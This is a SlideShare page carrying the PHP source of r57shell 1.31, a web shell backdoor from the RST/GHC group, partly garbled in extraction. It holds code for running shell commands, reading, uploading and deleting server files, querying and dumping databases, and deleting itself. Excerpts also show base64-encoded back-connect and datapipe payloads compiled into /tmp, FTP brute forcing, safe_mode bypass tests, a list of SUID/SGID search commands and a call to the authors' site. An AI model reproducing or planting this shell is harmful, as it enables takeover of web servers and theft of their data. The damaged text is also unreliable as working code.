<?php  /************************************************************************************************  ******/  /*  /* ...
// ?? ???????? ??????? ????? ??????????? ?? ???????!!! (CHANGE THIS!!!)  // ????? ? ?????? ????????? ? ??????? ????????? m...
color: #000000;  }  td {  BORDER-RIGHT: #aaaaaa 1px solid;  BORDER-TOP: #eeeeee 1px solid;  BORDER-LEFT: #eeeeee 1px solid...
BORDER-TOP: #999999 1px solid;  BORDER-LEFT: #999999 1px solid;  BORDER-BOTTOM: #ffffff 1px solid;  BACKGROUND-COLOR: #e4e...
}     function addFile($data, $name, $time = 0)     {       $name = str_replace(, /, $name);       $dtime = dechex($this->...
$ctrldir .           $this -> eof_ctrl_dir .           pack(v, sizeof($this -> ctrl_dir)) .           pack(v, sizeof($this...
var $user = ;   var $pass = ;   var $base = ;   var $db = ;   var $connection;   var $res;   var $error;   var $rows;   va...
if(@mssql_select_db($this->base,$this->connection)) return 1;      break;      case PostgreSQL:       return 1;      break...
return 1;         }        $error = @ocierror();        $this->error=$error[message];        }      break;      }    retur...
$this->dump[4] = ## Table: .$table;     $this->dump[5] = ## --------------------------------------- ;     switch($this->db...
{       case MySQL:        @mysql_close($this->connection);     break;     case MSSQL:      @mssql_close($this->connection...
}  if(isset($_GET[phpinfo])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a  href=".$_S...
echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows :  <b>".$ar."</b></font></td></tr></table><br>"; ...
@ob_end_clean();   }   return U_wordwrap((string) $value);   }  function U_wordwrap($str)   {   $str = @wordwrap(@htmlspec...
die();   }  if(isset($_GET[mem]))   {     echo $head;     echo <table width=100%><tr><td bgcolor=#cccccc><div align=center...
ru_text21=>????? ???,  ru_text22=>datapipe,  ru_text23=>????????? ????,  ru_text24=>????????? ????,  ru_text25=>????????? ...
ru_text67=>Chown/Chgrp/Chmod,  ru_text68=>???????,  ru_text69=>????????1,  ru_text70=>????????2,  ru_text71=>"?????? ?????...
copy(),  ru_text116=>?????????? ????,  ru_text117=>?,  ru_text118=>???? ??????????,  ru_text119=>?? ??????? ??????????? ??...
eng_text34=>Test bypass safe_mode with include function,  eng_text35=>Test bypass safe_mode with load file in mysql,  eng_...
eng_text85=>Test bypass safe_mode with commands execute via MSSQL server,  eng_text86=>Download files from server,  eng_bu...
find sgid files=>find / -type f -perm -02000 -ls,  find sgid files in current dir=>find . -type f -perm -02000 -ls,  find ...
$dir = @getcwd();  $unix = 0;  if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1;  if(empty($dir))   {   $os = gete...
}  if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }  $SERVER_SOFTWARE = getenv(SERVER_SOFTWARE); ...
}    return $users;  }  function err($n,$txt=)  {  echo <table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#ccc...
function cf($fname,$text)  {   $w_file=@fopen($fname,"w") or err(0);   if($w_file)   {   @fputs($w_file,@base64_decode($te...
{        var $text;        var $FilesToSearch;        var $ResultFiles;        var $FilesTotal;        var $MatchesCount; ...
$this->ResultFiles[$filename][$a+1] = $CurString;                  $this->MatchesCount += $count;                  $this->...
lIENPTk47DQpleGl0IDA7DQp9DQp9";  $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2...
gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHR  vbnMoKHVuc2lnbmVkIHNob3J0KS  hhd...
mRlZjsNCiR8ID0gMTsNCmlmICgkZGFl  bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IF  B...
3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSI  md2g9IitzY3JlZW4ud2lkdGgr  J3g...
@readfile ("http://rst.void.ru/r57shell_version/version.php?version=".$current_version."");}}  echo <body><table width=100...
echo "<br>".ws(2)."Free space : <b>".view_size($free)."</b> Total space: <b>".view_size($all)."</b>";  echo </font></td></...
{        $filename = @basename($_POST[loc_file]);        $filedump = @fread($file,@filesize($_POST[loc_file]));        fcl...
}         else if($_POST[action] == "delete")         {         if(unlink($_POST[mk_name])) echo "<table width=100% cellpa...
{   $mtime = @filemtime($_POST[e_name]);   if(!$file=@fopen($_POST[e_name],"w")) { err(0,$_POST[e_name]); }   else {   if(...
$blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");   @unlink("/tmp/dpc.c");   $blah = ex("/tmp/dpc ".$_POST[local_port]." ".$_POST[...
}     }    }   @ftp_close($connection);   $_POST[cmd] = "";   }  if(!empty($_POST[cmd]) && $_POST[cmd]=="ftp_brute")   {  ...
R57php 1231677414471772-2
R57php 1231677414471772-2
R57php 1231677414471772-2
R57php 1231677414471772-2
R57php 1231677414471772-2
R57php 1231677414471772-2
R57php 1231677414471772-2
R57php 1231677414471772-2
R57php 1231677414471772-2
Upcoming SlideShare
Loading in …5
×

R57php 1231677414471772-2

1,929 views

Published on

no

Published in: Technology, Lifestyle
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
1,929
On SlideShare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
2
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

R57php 1231677414471772-2

  1. 1. <?php /************************************************************************************************ ******/ /* /* # # # # /* # # # # /* # # # # /* # ## #### ## # /* ## ## ###### ## ## /* ## ## ###### ## ## /* ## ## #### ## ## /* ### ############ ### /* ######################## /* ############## /* ######## ########## ####### /* ### ## ########## ## ### /* ### ## ########## ## ### /* ### # ########## # ### /* ### ## ######## ## ### /* ## # ###### # ## /* ## # #### # ## /* ## ## /* /* /* /* r57shell.php - ?????? ?? ??? ??????????? ??? ????????? ????????? ??????? ?? ??????? ????? ??????? /* ?? ?????? ??????? ????? ?????? ?? ????? ?????: http://rst.void.ru /* ??????: 1.31 /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~*/ /* ????????? ????????????? ?? ?????? ? ????: blf, phoenix, virus, NorD ? ???? ?????? ?? RST/GHC. /* ???? ? ??? ???? ?????-???? ???? ?? ?????? ???? ????? ??????? ??????? ???????? ? ?????? ?? ?????? /* ?? rst@void.ru. ??? ??????????? ????? ???????????. /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~*/ /* (c)oded by 1dt.w0lf /* RST/GHC http://rst.void.ru , http://ghc.ru /* ANY MODIFIED REPUBLISHING IS RESTRICTED /************************************************************************************************ ******/ /* ~~~ ????????? | Options ~~~ */ // ????? ????? | Language // $language=ru - ??????? (russian) // $language=eng - english (??????????) $language=eng; // ?????????????? | Authentification // $auth = 1; - ?????????????? ???????? ( authentification = On ) // $auth = 0; - ?????????????? ????????? ( authentification = Off ) $auth = 0; // ????? ? ?????? ??? ??????? ? ??????? (Login & Password for access)file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  2. 2. // ?? ???????? ??????? ????? ??????????? ?? ???????!!! (CHANGE THIS!!!) // ????? ? ?????? ????????? ? ??????? ????????? md5, ???????? ?? ????????? r57 // Login & password crypted with md5, default is r57 $name=ec371748dc2da624b35a4f8f685dd122; // ????? ???????????? (user login) $pass=ec371748dc2da624b35a4f8f685dd122; // ?????? ???????????? (user password) /************************************************************************************************ ******/ error_reporting(0); set_magic_quotes_runtime(0); @set_time_limit(0); @ini_set(max_execution_time,0); @ini_set(output_buffering,0); $safe_mode = @ini_get(safe_mode); $version = 1.31; if(version_compare(phpversion(), 4.1.0) == -1) { $_POST = &$HTTP_POST_VARS; $_GET = &$HTTP_GET_VARS; $_SERVER = &$HTTP_SERVER_VARS; $_COOKIE = &$HTTP_COOKIE_VARS; } if (@get_magic_quotes_gpc()) { foreach ($_POST as $k=>$v) { $_POST[$k] = stripslashes($v); } foreach ($_COOKIE as $k=>$v) { $_COOKIE[$k] = stripslashes($v); } } if($auth == 1) { if (!isset($_SERVER[PHP_AUTH_USER]) || md5($_SERVER[PHP_AUTH_USER])!==$name || md5($_SERVER[PHP_AUTH_PW])!==$pass) { header(WWW-Authenticate: Basic realm="r57shell"); header(HTTP/1.0 401 Unauthorized); exit("<b><a href=http://rst.void.ru>r57shell</a> : Access Denied</b>"); } } $head = <!-- ??????????, ???? --> <html> <head> <title>r57shell</title> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> <STYLE> tr { BORDER-RIGHT: #aaaaaa 1px solid; BORDER-TOP: #eeeeee 1px solid; BORDER-LEFT: #eeeeee 1px solid; BORDER-BOTTOM: #aaaaaa 1px solid;file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  3. 3. color: #000000; } td { BORDER-RIGHT: #aaaaaa 1px solid; BORDER-TOP: #eeeeee 1px solid; BORDER-LEFT: #eeeeee 1px solid; BORDER-BOTTOM: #aaaaaa 1px solid; color: #000000; } .table1 { BORDER: 0px; BACKGROUND-COLOR: #D4D0C8; color: #000000; } .td1 { BORDER: 0px; font: 7pt Verdana; color: #000000; } .tr1 { BORDER: 0px; color: #000000; } table { BORDER: #eeeeee 1px outset; BACKGROUND-COLOR: #D4D0C8; color: #000000; } input { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: 8pt Verdana; color: #000000; } select { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: 8pt Verdana; color: #000000;; } submit { BORDER: buttonhighlight 2px outset; BACKGROUND-COLOR: #e4e0d8; width: 30%; color: #000000; } textarea { BORDER-RIGHT: #ffffff 1px solid;file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  4. 4. BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: Fixedsys bold; color: #000000; } BODY { margin: 1px; color: #000000; background-color: #e4e0d8; } A:link {COLOR:red; TEXT-DECORATION: none} A:visited { COLOR:red; TEXT-DECORATION: none} A:active {COLOR:red; TEXT-DECORATION: none} A:hover {color:blue;TEXT-DECORATION: none} </STYLE> <script language=javascript> function hide_div(id) { document.getElementById(id).style.display = none; document.cookie=id+=0;; } function show_div(id) { document.getElementById(id).style.display = block; document.cookie=id+=1;; } function change_divst(id) { if (document.getElementById(id).style.display == none) show_div(id); else hide_div(id); } </script>; class zipfile { var $datasec = array(); var $ctrl_dir = array(); var $eof_ctrl_dir = "x50x4bx05x06x00x00x00x00"; var $old_offset = 0; function unix2DosTime($unixtime = 0) { $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); if ($timearray[year] < 1980) { $timearray[year] = 1980; $timearray[mon] = 1; $timearray[mday] = 1; $timearray[hours] = 0; $timearray[minutes] = 0; $timearray[seconds] = 0; } return (($timearray[year] - 1980) << 25) | ($timearray[mon] << 21) | ($timearray[mday] << 16) | ($timearray[hours] << 11) | ($timearray[minutes] << 5) | ($timearray[seconds] >> 1);file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  5. 5. } function addFile($data, $name, $time = 0) { $name = str_replace(, /, $name); $dtime = dechex($this->unix2DosTime($time)); $hexdtime = x . $dtime[6] . $dtime[7] . x . $dtime[4] . $dtime[5] . x . $dtime[2] . $dtime[3] . x . $dtime[0] . $dtime[1]; eval($hexdtime = " . $hexdtime . ";); $fr = "x50x4bx03x04"; $fr .= "x14x00"; $fr .= "x00x00"; $fr .= "x08x00"; $fr .= $hexdtime; $unc_len = strlen($data); $crc = crc32($data); $zdata = gzcompress($data); $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); $c_len = strlen($zdata); $fr .= pack(V, $crc); $fr .= pack(V, $c_len); $fr .= pack(V, $unc_len); $fr .= pack(v, strlen($name)); $fr .= pack(v, 0); $fr .= $name; $fr .= $zdata; $this -> datasec[] = $fr; $cdrec = "x50x4bx01x02"; $cdrec .= "x00x00"; $cdrec .= "x14x00"; $cdrec .= "x00x00"; $cdrec .= "x08x00"; $cdrec .= $hexdtime; $cdrec .= pack(V, $crc); $cdrec .= pack(V, $c_len); $cdrec .= pack(V, $unc_len); $cdrec .= pack(v, strlen($name) ); $cdrec .= pack(v, 0 ); $cdrec .= pack(v, 0 ); $cdrec .= pack(v, 0 ); $cdrec .= pack(v, 0 ); $cdrec .= pack(V, 32 ); $cdrec .= pack(V, $this -> old_offset ); $this -> old_offset += strlen($fr); $cdrec .= $name; $this -> ctrl_dir[] = $cdrec; } function file() { $data = implode(, $this -> datasec); $ctrldir = implode(, $this -> ctrl_dir); return $data .file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  6. 6. $ctrldir . $this -> eof_ctrl_dir . pack(v, sizeof($this -> ctrl_dir)) . pack(v, sizeof($this -> ctrl_dir)) . pack(V, strlen($ctrldir)) . pack(V, strlen($data)) . "x00x00"; } } function compress(&$filename,&$filedump,$compress) { global $content_encoding; global $mime_type; if ($compress == bzip && @function_exists(bzcompress)) { $filename .= .bz2; $mime_type = application/x-bzip2; $filedump = bzcompress($filedump); } else if ($compress == gzip && @function_exists(gzencode)) { $filename .= .gz; $content_encoding = x-gzip; $mime_type = application/x-gzip; $filedump = gzencode($filedump); } else if ($compress == zip && @function_exists(gzcompress)) { $filename .= .zip; $mime_type = application/zip; $zipfile = new zipfile(); $zipfile -> addFile($filedump, substr($filename, 0, -4)); $filedump = $zipfile -> file(); } else { $mime_type = application/octet-stream; } } function mailattach($to,$from,$subj,$attach) { $headers = "From: $fromrn"; $headers .= "MIME-Version: 1.0rn"; $headers .= "Content-Type: ".$attach[type]; $headers .= "; name="".$attach[name].""rn"; $headers .= "Content-Transfer-Encoding: base64rnrn"; $headers .= chunk_split(base64_encode($attach[content]))."rn"; if(@mail($to,$subj,"",$headers)) { return 1; } return 0; } class my_sql { var $host = localhost; var $port = ;file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  7. 7. var $user = ; var $pass = ; var $base = ; var $db = ; var $connection; var $res; var $error; var $rows; var $columns; var $num_rows; var $num_fields; var $dump; function connect() { switch($this->db) { case MySQL: if(empty($this->port)) { $this->port = 3306; } if(!function_exists(mysql_connect)) return 0; $this->connection = @mysql_connect($this->host.:.$this->port,$this->user,$this->pass); if(is_resource($this->connection)) return 1; break; case MSSQL: if(empty($this->port)) { $this->port = 1433; } if(!function_exists(mssql_connect)) return 0; $this->connection = @mssql_connect($this->host.,.$this->port,$this->user,$this->pass); if($this->connection) return 1; break; case PostgreSQL: if(empty($this->port)) { $this->port = 5432; } $str = "host=".$this->host." port=".$this->port." user=".$this->user." password=".$this->pass." dbname=".$this->base.""; if(!function_exists(pg_connect)) return 0; $this->connection = @pg_connect($str); if(is_resource($this->connection)) return 1; break; case Oracle: if(!function_exists(ocilogon)) return 0; $this->connection = @ocilogon($this->user, $this->pass, $this->base); if(is_resource($this->connection)) return 1; break; } return 0; } function select_db() { switch($this->db) { case MySQL: if(@mysql_select_db($this->base,$this->connection)) return 1; break; case MSSQL:file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  8. 8. if(@mssql_select_db($this->base,$this->connection)) return 1; break; case PostgreSQL: return 1; break; case Oracle: return 1; break; } return 0; } function query($query) { $this->res=$this->error=; switch($this->db) { case MySQL: if(false===($this->res=@mysql_query(/*.chr(0).*/.$query,$this->connection))) { $this->error = @mysql_error($this->connection); return 0; } else if(is_resource($this->res)) { return 1; } return 2; break; case MSSQL: if(false===($this->res=@mssql_query($query,$this->connection))) { $this->error = Query error; return 0; } else if(@mssql_num_rows($this->res) > 0) { return 1; } return 2; break; case PostgreSQL: if(false===($this->res=@pg_query($this->connection,$query))) { $this->error = @pg_last_error($this->connection); return 0; } else if(@pg_num_rows($this->res) > 0) { return 1; } return 2; break; case Oracle: if(false===($this->res=@ociparse($this->connection,$query))) { $this->error = Query parse error; } else { if(@ociexecute($this->res)) { if(@ocirowcount($this->res) != 0) return 2;file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  9. 9. return 1; } $error = @ocierror(); $this->error=$error[message]; } break; } return 0; } function get_result() { $this->rows=array(); $this->columns=array(); $this->num_rows=$this->num_fields=0; switch($this->db) { case MySQL: $this->num_rows=@mysql_num_rows($this->res); $this->num_fields=@mysql_num_fields($this->res); while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res))); @mysql_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; case MSSQL: $this->num_rows=@mssql_num_rows($this->res); $this->num_fields=@mssql_num_fields($this->res); while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res))); @mssql_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}; break; case PostgreSQL: $this->num_rows=@pg_num_rows($this->res); $this->num_fields=@pg_num_fields($this->res); while(false !== ($this->rows[] = @pg_fetch_assoc($this->res))); @pg_free_result($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; case Oracle: $this->num_fields=@ocinumcols($this->res); while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++; @ocifreestatement($this->res); if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} break; } return 0; } function dump($table) { if(empty($table)) return 0; $this->dump=array(); $this->dump[0] = ##; $this->dump[1] = ## --------------------------------------- ; $this->dump[2] = ## Created: .date ("d/m/Y H:i:s"); $this->dump[3] = ## Database: .$this->base;file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  10. 10. $this->dump[4] = ## Table: .$table; $this->dump[5] = ## --------------------------------------- ; switch($this->db) { case MySQL: $this->dump[0] = ## MySQL dump; if($this->query(/*.chr(0).*/ SHOW CREATE TABLE `.$table.`)!=1) return 0; if(!$this->get_result()) return 0; $this->dump[] = $this->rows[0][Create Table]; $this->dump[] = ## --------------------------------------- ; if($this->query(/*.chr(0).*/ SELECT * FROM `.$table.`)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);} $this->dump[] = INSERT INTO `.$table.` (`.@implode("`, `", $this->columns).`) VALUES (.@implode(", ", $this->rows[$i]).);; } break; case MSSQL: $this->dump[0] = ## MSSQL dump; if($this->query(SELECT * FROM .$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} $this->dump[] = INSERT INTO .$table. (.@implode(", ", $this->columns).) VALUES (.@implode(", ", $this->rows[$i]).);; } break; case PostgreSQL: $this->dump[0] = ## PostgreSQL dump; if($this->query(SELECT * FROM .$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} $this->dump[] = INSERT INTO .$table. (.@implode(", ", $this->columns).) VALUES (.@implode(", ", $this->rows[$i]).);; } break; case Oracle: $this->dump[0] = ## ORACLE dump; $this->dump[] = ## under construction; break; default: return 0; break; } return 1; } function close() { switch($this->db)file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  11. 11. { case MySQL: @mysql_close($this->connection); break; case MSSQL: @mssql_close($this->connection); break; case PostgreSQL: @pg_close($this->connection); break; case Oracle: @oci_close($this->connection); break; } } function affected_rows() { switch($this->db) { case MySQL: return @mysql_affected_rows($this->res); break; case MSSQL: return @mssql_affected_rows($this->res); break; case PostgreSQL: return @pg_affected_rows($this->res); break; case Oracle: return @ocirowcount($this->res); break; default: return 0; break; } } } if(!empty($_POST[cmd]) && $_POST[cmd]=="download_file" && !empty($_POST[d_name])) { if(!$file=@fopen($_POST[d_name],"r")) { err(1,$_POST[d_name]); $_POST[cmd]=""; } else { @ob_clean(); $filename = @basename($_POST[d_name]); $filedump = @fread($file,@filesize($_POST[d_name])); fclose($file); $content_encoding=$mime_type=; compress($filename,$filedump,$_POST[compress]); if (!empty($content_encoding)) { header(Content-Encoding: . $content_encoding); } header("Content-type: ".$mime_type); header("Content-disposition: attachment; filename="".$filename."";"); echo $filedump; exit(); }file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  12. 12. } if(isset($_GET[phpinfo])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER[PHP_SELF].">BACK</a> ]</b></font></div>"; die(); } if (!empty($_POST[cmd]) && $_POST[cmd]=="db_query") { echo $head; $sql = new my_sql(); $sql->db = $_POST[db]; $sql->host = $_POST[db_server]; $sql->port = $_POST[db_port]; $sql->user = $_POST[mysql_l]; $sql->pass = $_POST[mysql_p]; $sql->base = $_POST[mysql_db]; $querys = @explode(;,$_POST[db_query]); echo <body bgcolor=#e4e0d8>; if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Cant connect to SQL server</b></font></div>"; else { if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Cant select database</b></font></div>"; else { foreach($querys as $num=>$query) { if(strlen($query)>5) { echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>"; switch($sql->query($query)) { case 0: echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql- >error."</b></font></td></tr></table>"; break; case 1: if($sql->get_result()) { echo "<table width=100%>"; foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES); $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", $sql->columns); echo "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; for($i=0;$i<$sql->num_rows;$i++) { foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES); $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$sql->rows[$i]); echo <tr><td><font face=Verdana size=-2>&nbsp;.$values.&nbsp;</font></td></tr>; } echo "</table>"; } break; case 2: $ar = $sql->affected_rows()?($sql->affected_rows()):(0);file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  13. 13. echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>"; break; } } } } } echo "<br><form name=form method=POST>"; echo in(hidden,db,0,$_POST[db]); echo in(hidden,db_server,0,$_POST[db_server]); echo in(hidden,db_port,0,$_POST[db_port]); echo in(hidden,mysql_l,0,$_POST[mysql_l]); echo in(hidden,mysql_p,0,$_POST[mysql_p]); echo in(hidden,mysql_db,0,$_POST[mysql_db]); echo in(hidden,cmd,0,db_query); echo "<div align=center>"; echo "<font face=Verdana size=-2><b>Base: </b><input type=text name=mysql_db value="".$sql- >base.""></font><br>"; echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST[db_query])?($_POST[db_query]):("SHOW DATABASES;nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=" Run SQL query "></div><br><br>"; echo "</form>"; echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER[PHP_SELF].">BACK</a> ]</b></font></div>"; die(); } if(isset($_GET[delete])) { @unlink(__FILE__); } if(isset($_GET[tmp])) { @unlink("/tmp/bdpl"); @unlink("/tmp/back"); @unlink("/tmp/bd"); @unlink("/tmp/bd.c"); @unlink("/tmp/dp"); @unlink("/tmp/dpc"); @unlink("/tmp/dpc.c"); } if(isset($_GET[phpini])) { echo $head; function U_value($value) { if ($value == ) return <i>no value</i>; if (@is_bool($value)) return $value ? TRUE : FALSE; if ($value === null) return NULL; if (@is_object($value)) $value = (array) $value; if (@is_array($value)) { @ob_start(); print_r($value); $value = @ob_get_contents();file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  14. 14. @ob_end_clean(); } return U_wordwrap((string) $value); } function U_wordwrap($str) { $str = @wordwrap(@htmlspecialchars($str), 100, <wbr />, true); return @preg_replace(!(&[^;]*)<wbr />([^;]*;)!, $1$2<wbr />, $str); } if (@function_exists(ini_get_all)) { $r = ; echo <table width=100%>, <tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>; foreach (@ini_get_all() as $key=>$value) { $r .= <tr><td>.ws(3).<font face=Verdana size=-2><b>.$key.</b></font></td><td><font face=Verdana size=- 2><div align=center><b>.U_value($value[local_value]).</b></div></font></td><td><font face=Verdana size=- 2><div align=center><b>.U_value($value[global_value]).</b></div></font></td></tr>; } echo $r; echo </table>; } echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER[PHP_SELF].">BACK</a> ]</b></font></div>"; die(); } if(isset($_GET[cpu])) { echo $head; echo <table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>; $cpuf = @file("cpuinfo"); if($cpuf) { $c = @sizeof($cpuf); for($i=0;$i<$c;$i++) { $info = @explode(":",$cpuf[$i]); if($info[1]==""){ $info[1]="---"; } $r .= <tr><td>.ws(3).<font face=Verdana size=-2><b>.trim($info[0]).</b></font></td><td><font face=Verdana size=-2><div align=center><b>.trim($info[1]).</b></div></font></td></tr>; } echo $r; } else { echo <tr><td>.ws(3).<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>; } echo </table>; echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER[PHP_SELF].">BACK</a> ]</b></font></div>";file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  15. 15. die(); } if(isset($_GET[mem])) { echo $head; echo <table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>; $memf = @file("meminfo"); if($memf) { $c = sizeof($memf); for($i=0;$i<$c;$i++) { $info = explode(":",$memf[$i]); if($info[1]==""){ $info[1]="---"; } $r .= <tr><td>.ws(3).<font face=Verdana size=-2><b>.trim($info[0]).</b></font></td><td><font face=Verdana size=-2><div align=center><b>.trim($info[1]).</b></div></font></td></tr>; } echo $r; } else { echo <tr><td>.ws(3).<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>; } echo </table>; echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER[PHP_SELF].">BACK</a> ]</b></font></div>"; die(); } $lang=array( ru_text1 =>??????????? ???????, ru_text2 =>?????????? ?????? ?? ???????, ru_text3 =>????????? ???????, ru_text4 =>??????? ??????????, ru_text5 =>???????? ?????? ?? ??????, ru_text6 =>????????? ????, ru_text7 =>??????, ru_text8 =>???????? ?????, ru_butt1 =>?????????, ru_butt2 =>?????????, ru_text9 =>???????? ????? ? ???????? ??? ? /bin/bash, ru_text10=>??????? ????, ru_text11=>?????? ??? ???????, ru_butt3 =>???????, ru_text12=>back-connect, ru_text13=>IP-?????, ru_text14=>????, ru_butt4 =>?????????, ru_text15=>???????? ?????? ? ?????????? ???????, ru_text16=>????????????, ru_text17=>????????? ????, ru_text18=>????????? ????, ru_text19=>Exploits, ru_text20=>????????????,file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
